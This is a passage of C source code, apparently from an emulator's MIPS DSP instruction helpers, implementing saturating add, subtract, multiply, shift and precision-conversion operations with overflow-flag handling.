set_DSPControl_overflow_flag(1, 16 + ac, env); } } static inline void mipsdsp_sat64_acc_sub_q63(int64_t *ret, int32_t ac, int64_t *a, CPUMIPSState *env) { bool temp64; ret[0] = env->active_tc.LO[ac] - a[0]; ret[1] = env->active_tc.HI[ac] - a[1]; if ((uint64_t)ret[0] > (uint64_t)env->active_tc.LO[ac]) { ret[1] -= 1; } temp64 = ret[1] & 1; if (temp64 != ((ret[0] >> 63) & 0x01)) { if (temp64) { ret[0] = (0x01ull << 63); ret[1] = ~0ull; } else { ret[0] = (0x01ull << 63) - 1; ret[1] = 0x00; } set_DSPControl_overflow_flag(1, 16 + ac, env); } } #endif static inline int32_t mipsdsp_mul_i16_i16(int16_t a, int16_t b, CPUMIPSState *env) { int32_t temp; temp = (int32_t)a * (int32_t)b; if ((temp > (int)0x7FFF) || (temp < (int)0xFFFF8000)) { set_DSPControl_overflow_flag(1, 21, env); } temp &= 0x0000FFFF; return temp; } static inline int32_t mipsdsp_mul_u16_u16(int32_t a, int32_t b) { return a * b; } #ifdef TARGET_MIPS64 static inline int32_t mipsdsp_mul_i32_i32(int32_t a, int32_t b) { return a * b; } #endif static inline int32_t mipsdsp_sat16_mul_i16_i16(int16_t a, int16_t b, CPUMIPSState *env) { int32_t temp; temp = (int32_t)a * (int32_t)b; if (temp > (int)0x7FFF) { temp = 0x00007FFF; set_DSPControl_overflow_flag(1, 21, env); } else if (temp < (int)0xffff8000) { temp = 0xFFFF8000; set_DSPControl_overflow_flag(1, 21, env); } temp &= 0x0000FFFF; return temp; } static inline int32_t mipsdsp_mul_q15_q15_overflowflag21(uint16_t a, uint16_t b, CPUMIPSState *env) { int32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFFFFFF; set_DSPControl_overflow_flag(1, 21, env); } else { temp = ((int16_t)a * (int16_t)b) << 1; } return temp; } /* right shift */ static inline uint8_t mipsdsp_rshift_u8(uint8_t a, target_ulong mov) { return a >> mov; } static inline uint16_t mipsdsp_rshift_u16(uint16_t a, target_ulong mov) { return a >> mov; } static inline int8_t mipsdsp_rashift8(int8_t a, target_ulong mov) { return a >> mov; } static inline int16_t mipsdsp_rashift16(int16_t a, target_ulong mov) { return a >> mov; } #ifdef TARGET_MIPS64 static inline int32_t mipsdsp_rashift32(int32_t a, target_ulong mov) { return a >> mov; } #endif static inline int16_t mipsdsp_rshift1_add_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a + (int32_t)b; return (temp >> 1) & 0xFFFF; } /* round right shift */ static inline int16_t mipsdsp_rrshift1_add_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a + (int32_t)b; temp += 1; return (temp >> 1) & 0xFFFF; } static inline int32_t mipsdsp_rshift1_add_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a + (int64_t)b; return (temp >> 1) & 0xFFFFFFFF; } static inline int32_t mipsdsp_rrshift1_add_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a + (int64_t)b; temp += 1; return (temp >> 1) & 0xFFFFFFFF; } static inline uint8_t mipsdsp_rshift1_add_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a + (uint16_t)b; return (temp >> 1) & 0x00FF; } static inline uint8_t mipsdsp_rrshift1_add_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a + (uint16_t)b + 1; return (temp >> 1) & 0x00FF; } #ifdef TARGET_MIPS64 static inline uint8_t mipsdsp_rshift1_sub_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a - (uint16_t)b; return (temp >> 1) & 0x00FF; } static inline uint8_t mipsdsp_rrshift1_sub_u8(uint8_t a, uint8_t b) { uint16_t temp; temp = (uint16_t)a - (uint16_t)b + 1; return (temp >> 1) & 0x00FF; } #endif /* 128 bits long. p[0] is LO, p[1] is HI. */ static inline void mipsdsp_rndrashift_short_acc(int64_t *p, int32_t ac, int32_t shift, CPUMIPSState *env) { int64_t acc; acc = ((int64_t)env->active_tc.HI[ac] << 32) | ((int64_t)env->active_tc.LO[ac] & 0xFFFFFFFF); p[0] = (shift == 0) ? (acc << 1) : (acc >> (shift - 1)); p[1] = (acc >> 63) & 0x01; } #ifdef TARGET_MIPS64 /* 128 bits long. p[0] is LO, p[1] is HI */ static inline void mipsdsp_rashift_acc(uint64_t *p, uint32_t ac, uint32_t shift, CPUMIPSState *env) { uint64_t tempB, tempA; tempB = env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; shift = shift & 0x1F; if (shift == 0) { p[1] = tempB; p[0] = tempA; } else { p[0] = (tempB << (64 - shift)) | (tempA >> shift); p[1] = (int64_t)tempB >> shift; } } /* 128 bits long. p[0] is LO, p[1] is HI , p[2] is sign of HI.*/ static inline void mipsdsp_rndrashift_acc(uint64_t *p, uint32_t ac, uint32_t shift, CPUMIPSState *env) { int64_t tempB, tempA; tempB = env->active_tc.HI[ac]; tempA = env->active_tc.LO[ac]; shift = shift & 0x3F; if (shift == 0) { p[2] = tempB >> 63; p[1] = (tempB << 1) | (tempA >> 63); p[0] = tempA << 1; } else { p[0] = (tempB << (65 - shift)) | (tempA >> (shift - 1)); p[1] = (int64_t)tempB >> (shift - 1); if (tempB >= 0) { p[2] = 0x0; } else { p[2] = ~0ull; } } } #endif static inline int32_t mipsdsp_mul_q15_q15(int32_t ac, uint16_t a, uint16_t b, CPUMIPSState *env) { int32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFFFFFF; set_DSPControl_overflow_flag(1, 16 + ac, env); } else { temp = ((int16_t)a * (int16_t)b) << 1; } return temp; } static inline int64_t mipsdsp_mul_q31_q31(int32_t ac, uint32_t a, uint32_t b, CPUMIPSState *env) { uint64_t temp; if ((a == 0x80000000) && (b == 0x80000000)) { temp = (0x01ull << 63) - 1; set_DSPControl_overflow_flag(1, 16 + ac, env); } else { temp = ((int64_t)(int32_t)a * (int32_t)b) << 1; } return temp; } static inline uint16_t mipsdsp_mul_u8_u8(uint8_t a, uint8_t b) { return (uint16_t)a * (uint16_t)b; } static inline uint16_t mipsdsp_mul_u8_u16(uint8_t a, uint16_t b, CPUMIPSState *env) { uint32_t tempI; tempI = (uint32_t)a * (uint32_t)b; if (tempI > 0x0000FFFF) { tempI = 0x0000FFFF; set_DSPControl_overflow_flag(1, 21, env); } return tempI & 0x0000FFFF; } #ifdef TARGET_MIPS64 static inline uint64_t mipsdsp_mul_u32_u32(uint32_t a, uint32_t b) { return (uint64_t)a * (uint64_t)b; } #endif static inline int16_t mipsdsp_rndq15_mul_q15_q15(uint16_t a, uint16_t b, CPUMIPSState *env) { uint32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFF0000; set_DSPControl_overflow_flag(1, 21, env); } else { temp = ((int16_t)a * (int16_t)b) << 1; temp = temp + 0x00008000; } return (temp & 0xFFFF0000) >> 16; } static inline int32_t mipsdsp_sat16_mul_q15_q15(uint16_t a, uint16_t b, CPUMIPSState *env) { int32_t temp; if ((a == 0x8000) && (b == 0x8000)) { temp = 0x7FFF0000; set_DSPControl_overflow_flag(1, 21, env); } else { temp = (int16_t)a * (int16_t)b; temp = temp << 1; } return (temp >> 16) & 0x0000FFFF; } static inline uint16_t mipsdsp_trunc16_sat16_round(int32_t a, CPUMIPSState *env) { uint16_t temp; /* * The value 0x00008000 will be added to the input Q31 value, and the code * needs to check if the addition causes an overflow. Since a positive value * is added, overflow can happen in one direction only. */ if (a > 0x7FFF7FFF) { temp = 0x7FFF; set_DSPControl_overflow_flag(1, 22, env); } else { temp = ((a + 0x8000) >> 16) & 0xFFFF; } return temp; } static inline uint8_t mipsdsp_sat8_reduce_precision(uint16_t a, CPUMIPSState *env) { uint16_t mag; uint32_t sign; sign = (a >> 15) & 0x01; mag = a & 0x7FFF; if (sign == 0) { if (mag > 0x7F80) { set_DSPControl_overflow_flag(1, 22, env); return 0xFF; } else { return (mag >> 7) & 0xFFFF; } } else { set_DSPControl_overflow_flag(1, 22, env); return 0x00; } } static inline uint8_t mipsdsp_lshift8(uint8_t a, uint8_t s, CPUMIPSState *env) { uint8_t discard; if (s != 0) { discard = a >> (8 - s); if (discard != 0x00) { set_DSPControl_overflow_flag(1, 22, env); } } return a << s; } static inline uint16_t mipsdsp_lshift16(uint16_t a, uint8_t s, CPUMIPSState *env) { uint16_t discard; if (s != 0) { discard = (int16_t)a >> (15 - s); if ((discard != 0x0000) && (discard != 0xFFFF)) { set_DSPControl_overflow_flag(1, 22, env); } } return a << s; } #ifdef TARGET_MIPS64 static inline uint32_t mipsdsp_lshift32(uint32_t a, uint8_t s, CPUMIPSState *env) { uint32_t discard; if (s == 0) { return a; } else { discard = (int32_t)a >> (31 - (s - 1)); if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { set_DSPControl_overflow_flag(1, 22, env); } return a << s; } } #endif static inline uint16_t mipsdsp_sat16_lshift(uint16_t a, uint8_t s, CPUMIPSState *env) { uint8_t sign; uint16_t discard; if (s == 0) { return a; } else { sign = (a >> 15) & 0x01; if (sign != 0) { discard = (((0x01 << (16 - s)) - 1) << s) | ((a >> (14 - (s - 1))) & ((0x01 << s) - 1)); } else { discard = a >> (14 - (s - 1)); } if ((discard != 0x0000) && (discard != 0xFFFF)) { set_DSPControl_overflow_flag(1, 22, env); return (sign == 0) ? 0x7FFF : 0x8000; } else { return a << s; } } } static inline uint32_t mipsdsp_sat32_lshift(uint32_t a, uint8_t s, CPUMIPSState *env) { uint8_t sign; uint32_t discard; if (s == 0) { return a; } else { sign = (a >> 31) & 0x01; if (sign != 0) { discard = (((0x01 << (32 - s)) - 1) << s) | ((a >> (30 - (s - 1))) & ((0x01 << s) - 1)); } else { discard = a >> (30 - (s - 1)); } if ((discard != 0x00000000) && (discard != 0xFFFFFFFF)) { set_DSPControl_overflow_flag(1, 22, env); return (sign == 0) ? 0x7FFFFFFF : 0x80000000; } else { return a << s; } } } static inline uint8_t mipsdsp_rnd8_rashift(uint8_t a, uint8_t s) { uint32_t temp; if (s == 0) { temp = (uint32_t)a << 1; } else { temp = (int32_t)(int8_t)a >> (s - 1); } return (temp + 1) >> 1; } static inline uint16_t mipsdsp_rnd16_rashift(uint16_t a, uint8_t s) { uint32_t temp; if (s == 0) { temp = (uint32_t)a << 1; } else { temp = (int32_t)(int16_t)a >> (s - 1); } return (temp + 1) >> 1; } static inline uint32_t mipsdsp_rnd32_rashift(uint32_t a, uint8_t s) { int64_t temp; if (s == 0) { temp = (uint64_t)a << 1; } else { temp = (int64_t)(int32_t)a >> (s - 1); } temp += 1; return (temp >> 1) & 0xFFFFFFFFull; } static inline uint16_t mipsdsp_sub_i16(int16_t a, int16_t b, CPUMIPSState *env) { int16_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { set_DSPControl_overflow_flag(1, 20, env); } return temp; } static inline uint16_t mipsdsp_sat16_sub(int16_t a, int16_t b, CPUMIPSState *env) { int16_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x8000)) { if (a >= 0) { temp = 0x7FFF; } else { temp = 0x8000; } set_DSPControl_overflow_flag(1, 20, env); } return temp; } static inline uint32_t mipsdsp_sat32_sub(int32_t a, int32_t b, CPUMIPSState *env) { int32_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { if (a >= 0) { temp = 0x7FFFFFFF; } else { temp = 0x80000000; } set_DSPControl_overflow_flag(1, 20, env); } return temp & 0xFFFFFFFFull; } static inline uint16_t mipsdsp_rshift1_sub_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a - (int32_t)b; return (temp >> 1) & 0x0000FFFF; } static inline uint16_t mipsdsp_rrshift1_sub_q16(int16_t a, int16_t b) { int32_t temp; temp = (int32_t)a - (int32_t)b; temp += 1; return (temp >> 1) & 0x0000FFFF; } static inline uint32_t mipsdsp_rshift1_sub_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a - (int64_t)b; return (temp >> 1) & 0xFFFFFFFFull; } static inline uint32_t mipsdsp_rrshift1_sub_q32(int32_t a, int32_t b) { int64_t temp; temp = (int64_t)a - (int64_t)b; temp += 1; return (temp >> 1) & 0xFFFFFFFFull; } static inline uint16_t mipsdsp_sub_u16_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint8_t temp16; uint32_t temp; temp = (uint32_t)a - (uint32_t)b; temp16 = (temp >> 16) & 0x01; if (temp16 == 1) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x0000FFFF; } static inline uint16_t mipsdsp_satu16_sub_u16_u16(uint16_t a, uint16_t b, CPUMIPSState *env) { uint8_t temp16; uint32_t temp; temp = (uint32_t)a - (uint32_t)b; temp16 = (temp >> 16) & 0x01; if (temp16 == 1) { temp = 0x0000; set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x0000FFFF; } static inline uint8_t mipsdsp_sub_u8(uint8_t a, uint8_t b, CPUMIPSState *env) { uint8_t temp8; uint16_t temp; temp = (uint16_t)a - (uint16_t)b; temp8 = (temp >> 8) & 0x01; if (temp8 == 1) { set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x00FF; } static inline uint8_t mipsdsp_satu8_sub(uint8_t a, uint8_t b, CPUMIPSState *env) { uint8_t temp8; uint16_t temp; temp = (uint16_t)a - (uint16_t)b; temp8 = (temp >> 8) & 0x01; if (temp8 == 1) { temp = 0x00; set_DSPControl_overflow_flag(1, 20, env); } return temp & 0x00FF; } #ifdef TARGET_MIPS64 static inline uint32_t mipsdsp_sub32(int32_t a, int32_t b, CPUMIPSState *env) { int32_t temp; temp = a - b; if (MIPSDSP_OVERFLOW_SUB(a, b, temp, 0x80000000)) { set_DSPControl_overflow_flag(1, 20, env); } return temp; } static inline int32_t mipsdsp_add_i32(int32_t a, int32_t b, CPUMIPSState *env) { int32_t temp; temp = a + b; if (MIPSDSP_OVERFLOW_ADD(a, b, temp, 0x80000000)) { set_DSPControl_overflow_flag(1, 20, env); } return temp; } #endif static inline int32_t mipsdsp_cmp_eq(int32_t a, int32_t b) { return a == b; } static inline int32_t mipsdsp_cmp_le(int32_t a, int32_t b) { return a <= b; } static inline int32_t mipsdsp_cmp_lt(int32_t a, int32_t b) { return a < b; } static inline int32_t mipsdsp_cmpu_eq(uint32_t a, uint32_t b) { return a == b; } static inline int32_t mipsdsp_cmpu_le(uint32_t a, uint32_t b) { return a <= b; } static inline int32_t mipsdsp_cmpu_lt(uint32_t a, uint32_t b) { return a < b; } /*** MIPS DSP internal functions end ***/ #define MIPSDSP_LHI 0xFFFFFFFF00000000ull #define MIPSDSP_LLO 0x00000000FFFFFFFFull #define MIPSDSP_HI 0xFFFF0000 #define MIPSDSP_LO 0x0000FFFF #define MIPSDSP_Q3 0xFF000000 #define MIPSDSP_Q2 0x00FF0000 #define MIPSDSP_Q1 0x0000FF00 #define MIPSDSP_Q0 0x000000FF #define MIPSDSP_SPLIT32_8(num, a, b, c, d) \ do { \ a = ((num) >> 24) & MIPSDSP_Q0; \ b = ((num) >> 16) & MIPSDSP_Q0; \ c = ((num) >> 8) & MIPSDSP_Q0; \ d = (num) & MIPSDSP_Q0; \ } while (0) #define MIPSDSP_SPLIT32_16(num, a, b) \ do { \ a = ((num) >> 16) & MIPSDSP_LO; \ b = (num) & MIPSDSP_LO; \ } while (0) #define MIPSDSP_RETURN32_8(a, b, c, d) ((target_long)(int32_t) \ (((uint32_t)(a) << 24) | \ ((uint32_t)(b) << 16) | \ ((uint32_t)(c) << 8) | \ ((uint32_t)(d) & 0xFF))) #define MIPSDSP_RETURN32_16(a, b) ((target_long)(int32_t) \ (((uint32_t)(a) << 16) | \ ((uint32_t)(b) & 0xFFFF))) #ifdef TARGET_MIPS64 #define MIPSDSP_SPLIT64_16(num, a, b, c, d) \ do { \ a = ((num) >> 48) & MIPSDSP_LO; \ b = ((num) >> 32) & MIPSDSP_LO; \ c = ((num) >> 16) & MIPSDSP_LO; \ d = (num) & MIPSDSP_LO; \ } while (0) #define MIPSDSP_SPLIT64_32(num, a, b) \ do { \ a = ((num) >> 32) & MIPSDSP_LLO; \ b = (num) & MIPSDSP_LLO; \ } while (0) #define MIPSDSP_RETURN64_16(a, b, c, d) (((uint64_t)(a) << 48) | \ ((uint64_t)(b) << 32) | \ ((uint64_t)(c) << 16) | \ (uint64_t)(d)) #define MIPSDSP_RETURN64_32(a, b) (((uint64_t)(a) << 32) | (uint64_t)(b)) #endif /** DSP Arithmetic Sub-class insns **/ #define MIPSDSP32_UNOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ { \ DSP32Value dt; \ unsigned int i; \ \ dt.sw[0] = rt; \ \ for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ dt.element[i] = mipsdsp_##func(dt.element[i], env); \ } \ \ return (target_long)dt.sw[0]; \ } MIPSDSP32_UNOP_ENV(absq_s_ph, sat_abs16, sh) MIPSDSP32_UNOP_ENV(absq_s_qb, sat_abs8, sb) MIPSDSP32_UNOP_ENV(absq_s_w, sat_abs32, sw) #undef MIPSDSP32_UNOP_ENV #if defined(TARGET_MIPS64) #define MIPSDSP64_UNOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rt, CPUMIPSState *env) \ { \ DSP64Value dt; \ unsigned int i; \ \ dt.sl[0] = rt; \ \ for (i = 0; i < ARRAY_SIZE(dt.element); i++) { \ dt.element[i] = mipsdsp_##func(dt.element[i], env); \ } \ \ return dt.sl[0]; \ } MIPSDSP64_UNOP_ENV(absq_s_ob, sat_abs8, sb) MIPSDSP64_UNOP_ENV(absq_s_qh, sat_abs16, sh) MIPSDSP64_UNOP_ENV(absq_s_pw, sat_abs32, sw) #undef MIPSDSP64_UNOP_ENV #endif #define MIPSDSP32_BINOP(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt) \ { \ DSP32Value ds, dt; \ unsigned int i; \ \ ds.sw[0] = rs; \ dt.sw[0] = rt; \ \ for (i = 0; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ } \ \ return (target_long)ds.sw[0]; \ } MIPSDSP32_BINOP(addqh_ph, rshift1_add_q16, sh); MIPSDSP32_BINOP(addqh_r_ph, rrshift1_add_q16, sh); MIPSDSP32_BINOP(addqh_r_w, rrshift1_add_q32, sw); MIPSDSP32_BINOP(addqh_w, rshift1_add_q32, sw); MIPSDSP32_BINOP(adduh_qb, rshift1_add_u8, ub); MIPSDSP32_BINOP(adduh_r_qb, rrshift1_add_u8, ub); MIPSDSP32_BINOP(subqh_ph, rshift1_sub_q16, sh); MIPSDSP32_BINOP(subqh_r_ph, rrshift1_sub_q16, sh); MIPSDSP32_BINOP(subqh_r_w, rrshift1_sub_q32, sw); MIPSDSP32_BINOP(subqh_w, rshift1_sub_q32, sw); #undef MIPSDSP32_BINOP #define MIPSDSP32_BINOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ DSP32Value ds, dt; \ unsigned int i; \ \ ds.sw[0] = rs; \ dt.sw[0] = rt; \ \ for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ } \ \ return (target_long)ds.sw[0]; \ } MIPSDSP32_BINOP_ENV(addq_ph, add_i16, sh) MIPSDSP32_BINOP_ENV(addq_s_ph, sat_add_i16, sh) MIPSDSP32_BINOP_ENV(addq_s_w, sat_add_i32, sw); MIPSDSP32_BINOP_ENV(addu_ph, add_u16, sh) MIPSDSP32_BINOP_ENV(addu_qb, add_u8, ub); MIPSDSP32_BINOP_ENV(addu_s_ph, sat_add_u16, sh) MIPSDSP32_BINOP_ENV(addu_s_qb, sat_add_u8, ub); MIPSDSP32_BINOP_ENV(subq_ph, sub_i16, sh); MIPSDSP32_BINOP_ENV(subq_s_ph, sat16_sub, sh); MIPSDSP32_BINOP_ENV(subq_s_w, sat32_sub, sw); MIPSDSP32_BINOP_ENV(subu_ph, sub_u16_u16, sh); MIPSDSP32_BINOP_ENV(subu_qb, sub_u8, ub); MIPSDSP32_BINOP_ENV(subu_s_ph, satu16_sub_u16_u16, sh); MIPSDSP32_BINOP_ENV(subu_s_qb, satu8_sub, ub); #undef MIPSDSP32_BINOP_ENV #ifdef TARGET_MIPS64 #define MIPSDSP64_BINOP(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt) \ { \ DSP64Value ds, dt; \ unsigned int i; \ \ ds.sl[0] = rs; \ dt.sl[0] = rt; \ \ for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i]); \ } \ \ return ds.sl[0]; \ } MIPSDSP64_BINOP(adduh_ob, rshift1_add_u8, ub); MIPSDSP64_BINOP(adduh_r_ob, rrshift1_add_u8, ub); MIPSDSP64_BINOP(subuh_ob, rshift1_sub_u8, ub); MIPSDSP64_BINOP(subuh_r_ob, rrshift1_sub_u8, ub); #undef MIPSDSP64_BINOP #define MIPSDSP64_BINOP_ENV(name, func, element) \ target_ulong helper_##name(target_ulong rs, target_ulong rt, \ CPUMIPSState *env) \ { \ DSP64Value ds, dt; \ unsigned int i; \ \ ds.sl[0] = rs; \ dt.sl[0] = rt; \ \ for (i = 0 ; i < ARRAY_SIZE(ds.element); i++) { \ ds.element[i] = mipsdsp_##func(ds.element[i], dt.element[i], env); \ } \ \ return ds.sl[0]; \ } MIPSDSP64_BINOP_ENV(addq_pw, add_i32, sw); MIPSDSP64_BINOP_ENV(addq_qh, add_i16, sh); MIPSDSP64_BINOP_ENV(addq_s_pw, sat_add_i32, sw); MIPSDSP64_BINOP_ENV(addq_s_qh, sat_add_i16, sh); MIPSDSP64_BINOP_ENV(addu_ob, add_u8, uh); MIPSDSP64_BINOP_ENV(addu_qh, add_u16, uh); MIPSDSP64_BINOP_ENV(addu_s_ob, sat_add_u8, uh); MIPSDSP64_BINOP_ENV(addu_s_qh, sat_add_u16, uh); MIPSDSP64_BINOP_ENV(subq_pw, sub32, sw); MIPSDSP64_BINOP_ENV(subq_qh, sub_i16, sh); MIPSDSP64_BINOP_ENV(subq_s_pw, sat32_sub, sw); MIPSDSP64_BINOP_ENV(subq_s_qh, sat16_sub, sh); MIPSDSP64_BINOP_ENV(subu_ob, sub_u8, uh); MIPSDSP64_BINOP_ENV(subu_qh, sub_u16_u16, uh); MIPSDSP64_BINOP_ENV(subu_s_ob, satu8_sub, uh); MIPSDSP64_BINOP_ENV(subu_s_qh, satu16_sub_u16_u16, uh); #undef MIPSDSP64_BINOP_ENV #endif #define SUBUH_QB(name, var) \ target_ulong helper_##name##_qb(target_ulong rs, target_ulong rt) \ { \ uint8_t rs3, rs2, rs1, rs0; \ uint8_t rt3, rt2, rt1, rt0; \ uint8_t tempD, tempC, tempB, tempA; \ \ MIPSDSP_SPLIT32_8(rs, rs3, rs2, rs1, rs0); \ MIPSDSP_SPLIT32_8(rt, rt3, rt2, rt1, rt0); \ \ tempD = ((uint16_t)rs3 - (uint16_t)rt3 + var) >> 1; \ tempC = ((uint16_t)rs2 - (uint16_t)rt2 + var) >> 1; \ tempB = ((uint16_t)rs1 - (uint16_t)rt1 + var) >> 1; \ tempA = ((uint16_t)rs0 - (uint16_t)rt0 + var) >> 1; \ \ return ((uint32_t)tempD << 24) | ((uint32_t)tempC << 16) | \ ((uint32_t)tempB << 8) | ((uint32_t)tempA); \ } SUBUH_QB(subuh, 0); SUBUH_QB(subuh_r, 1); #undef SUBUH_QB target_ulong helper_addsc(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint64_t temp, tempRs, tempRt; bool flag; tempRs = (uint64_t)rs & MIPSDSP_LLO; tempRt = (uint64_t)rt & MIPSDSP_LLO; temp = tempRs + tempRt; flag = (temp & 0x0100000000ull) >> 32; set_DSPControl_carryflag(flag, env); return (target_long)(int32_t)(temp & MIPSDSP_LLO); } target_ulong helper_addwc(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint32_t rd; int32_t temp32, temp31; int64_t tempL; tempL = (int64_t)(int32_t)rs + (int64_t)(int32_t)rt + get_DSPControl_carryflag(env); temp31 = (tempL >> 31) & 0x01; temp32 = (tempL >> 32) & 0x01; if (temp31 != temp32) { set_DSPControl_overflow_flag(1, 20, env); } rd = tempL & MIPSDSP_LLO; return (target_long)(int32_t)rd; } target_ulong helper_modsub(target_ulong rs, target_ulong rt) { int32_t decr; uint16_t lastindex; target_ulong rd; decr = rt & MIPSDSP_Q0; lastindex = (rt >> 8) & MIPSDSP_LO; if ((rs & MIPSDSP_LLO) == 0x00000000) { rd = (target_ulong)lastindex; } else { rd = rs - decr; } return rd; } target_ulong helper_raddu_w_qb(target_ulong rs) { target_ulong ret = 0; DSP32Value ds; unsigned int i; ds.uw[0] = rs; for (i = 0; i < 4; i++) { ret += ds.ub[i]; } return ret; } #if defined(TARGET_MIPS64) target_ulong helper_raddu_l_ob(target_ulong rs) { target_ulong ret = 0; DSP64Value ds; unsigned int i; ds.ul[0] = rs; for (i = 0; i < 8; i++) { ret += ds.ub[i]; } return ret; } #endif #define PRECR_QB_PH(name, a, b)\ target_ulong helper_##name##_qb_ph(target_ulong rs, target_ulong rt) \ { \ uint8_t tempD, tempC, tempB, tempA; \ \ tempD = (rs >> a) & MIPSDSP_Q0; \ tempC = (rs >> b) & MIPSDSP_Q0; \ tempB = (rt >> a) & MIPSDSP_Q0; \ tempA = (rt >> b) & MIPSDSP_Q0; \ \ return MIPSDSP_RETURN32_8(tempD, tempC, tempB, tempA); \ } PRECR_QB_PH(precr, 16, 0); PRECR_QB_PH(precrq, 24, 8); #undef PRECR_QB_OH target_ulong helper_precr_sra_ph_w(uint32_t sa, target_ulong rs, target_ulong rt) { uint16_t tempB, tempA; tempB = ((int32_t)rt >> sa) & MIPSDSP_LO; tempA = ((int32_t)rs >> sa) & MIPSDSP_LO; return MIPSDSP_RETURN32_16(tempB, tempA); } target_ulong helper_precr_sra_r_ph_w(uint32_t sa, target_ulong rs, target_ulong rt) { uint64_t tempB, tempA; /* If sa = 0, then (sa - 1) = -1 will case shift error, so we need else. */ if (sa == 0) { tempB = (rt & MIPSDSP_LO) << 1; tempA = (rs & MIPSDSP_LO) << 1; } else { tempB = ((int32_t)rt >> (sa - 1)) + 1; tempA = ((int32_t)rs >> (sa - 1)) + 1; } rt = (((tempB >> 1) & MIPSDSP_LO) << 16) | ((tempA >> 1) & MIPSDSP_LO); return (target_long)(int32_t)rt; } target_ulong helper_precrq_ph_w(target_ulong rs, target_ulong rt) { uint16_t tempB, tempA; tempB = (rs & MIPSDSP_HI) >> 16; tempA = (rt & MIPSDSP_HI) >> 16; return MIPSDSP_RETURN32_16(tempB, tempA); } target_ulong helper_precrq_rs_ph_w(target_ulong rs, target_ulong rt, CPUMIPSState *env) { uint16_t tempB, tempA; tempB = mipsdsp_trunc16_sat16_round(rs, env); tempA = mipsdsp_trunc16_sat16_round(rt, env); return MIPSDSP_RETURN32_16(tempB, tempA); } #if defined(TARGET_MIPS64) target_ulong helper_precr_ob_qh(target_ulong rs, target_ulong rt) { uint8_t rs6, rs4, rs2, rs0; uint8_t rt6, rt4, rt2, rt0; uint64_t temp; rs6 = (rs >> 48) & MIPSDSP_Q0; rs4 = (rs >> 32) & MIPSDSP_Q0; rs2 = (rs >> 16) & MIPSDSP_Q0; rs0 = rs & MIPSDSP_Q0; rt6 = (rt >> 48) & MIPSDSP_Q0; rt4 = (rt >> 32) & MIPSDSP_Q0; rt2 = (rt >> 16) & MIPSDSP_Q0; rt0 = rt & MIPSDSP_Q0; temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | ((uint64_t)rs2 << 40) | ((uint64_t)rs0 << 32) | ((uint64_t)rt6 << 24) | ((uint64_t)rt4 << 16) | ((uint64_t)rt2 << 8) | (uint64_t)rt0; return temp; } /* * In case sa == 0, use rt2, rt0, rs2, rs0. * In case sa != 0, use rt3, rt1, rs3, rs1. */ #define PRECR_QH_PW(name, var) \ target_ulong helper_precr_##name##_qh_pw(target_ulong rs, \ target_ulong rt, \ uint32_t sa) \ { \ uint16_t rs3, rs2, rs1, rs0; \ uint16_t rt3, rt2, rt1, rt0; \ uint16_t tempD, tempC, tempB, tempA; \ \ MIPSDSP_SPLIT64_16(rs, rs3, rs2, rs1, rs0); \ MIPSDSP_SPLIT64_16(rt, rt3, rt2, rt1, rt0); \ \ if (sa == 0) { \ tempD = rt2 << var; \ tempC = rt0 << var; \ tempB = rs2 << var; \ tempA = rs0 << var; \ } else { \ tempD = (((int16_t)rt3 >> sa) + var) >> var; \ tempC = (((int16_t)rt1 >> sa) + var) >> var; \ tempB = (((int16_t)rs3 >> sa) + var) >> var; \ tempA = (((int16_t)rs1 >> sa) + var) >> var; \ } \ \ return MIPSDSP_RETURN64_16(tempD, tempC, tempB, tempA); \ } PRECR_QH_PW(sra, 0); PRECR_QH_PW(sra_r, 1); #undef PRECR_QH_PW target_ulong helper_precrq_ob_qh(target_ulong rs, target_ulong rt) { uint8_t rs6, rs4, rs2, rs0; uint8_t rt6, rt4, rt2, rt0; uint64_t temp; rs6 = (rs >> 56) & MIPSDSP_Q0; rs4 = (rs >> 40) & MIPSDSP_Q0; rs2 = (rs >> 24) & MIPSDSP_Q0; rs0 = (rs >> 8) & MIPSDSP_Q0; rt6 = (rt >> 56) & MIPSDSP_Q0; rt4 = (rt >> 40) & MIPSDSP_Q0; rt2 = (rt >> 24) & MIPSDSP_Q0; rt0 = (rt >> 8) & MIPSDSP_Q0; temp = ((uint64_t)rs6 << 56) | ((uint64_t)rs4 << 48) | 